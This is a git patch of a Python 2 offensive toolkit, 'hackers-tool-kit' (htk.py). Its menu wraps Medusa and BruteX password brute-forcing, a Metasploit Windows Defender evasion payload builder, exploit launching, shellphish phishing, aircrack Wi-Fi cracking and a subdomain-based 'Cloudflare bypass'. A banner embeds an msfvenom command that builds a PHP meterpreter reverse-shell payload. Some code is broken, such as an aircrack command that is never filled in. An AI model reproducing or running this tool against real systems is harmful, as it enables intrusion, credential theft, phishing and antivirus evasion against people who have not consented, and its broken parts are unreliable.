hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From c0aab8c6adf196315330b41b715a12fed2ef3a37 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 21:56:32 +0100 Subject: [PATCH 116/214] Add files via upload --- htk.py | 2740 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2740 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..c7b48f5 --- /dev/null +++ b/htk.py @@ -0,0 +1,2740 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[9msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php1m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + 